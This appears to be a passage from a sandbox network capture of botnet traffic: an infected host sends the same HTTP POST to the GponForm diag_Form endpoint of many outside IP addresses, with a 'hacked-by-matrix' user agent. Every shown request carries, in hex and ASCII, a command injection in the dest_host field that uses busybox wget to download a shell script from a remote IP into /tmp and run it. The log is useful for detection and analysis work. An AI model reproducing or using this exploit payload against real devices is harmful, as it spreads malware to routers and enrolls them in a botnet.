                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1494192.168.2.1336082118.69.52.172443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750205994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1495192.168.2.135964042.183.28.217443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750216007 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1496192.168.2.1346104109.58.141.93443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750225067 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1497192.168.2.1354860118.204.250.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750252962 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1498192.168.2.1355148212.180.25.167443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750263929 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1499192.168.2.13500205.33.164.241443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750263929 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1500192.168.2.1354314212.112.108.123443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750279903 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1501192.168.2.1351534212.188.210.139443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750302076 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1502192.168.2.13433365.187.73.119443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750348091 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1503192.168.2.1334412109.239.137.117443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750354052 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1504192.168.2.1335516212.48.217.182443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750356913 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1505192.168.2.135594842.42.151.5443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750364065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1506192.168.2.13382965.62.126.209443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750364065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1507192.168.2.133940842.230.182.220443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750391960 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1508192.168.2.1336740118.54.46.220443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750391960 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1509192.168.2.1338600212.64.170.185443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750408888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1510192.168.2.1344878118.183.58.196443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750444889 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1511192.168.2.1345200118.96.231.158443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750467062 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1512192.168.2.13485425.197.122.52443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750487089 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1513192.168.2.134788642.32.167.214443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750492096 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1514192.168.2.1348142212.190.56.134443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750510931 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1515192.168.2.1338562109.123.159.29443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750515938 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1516192.168.2.1344340109.64.71.233443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750533104 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
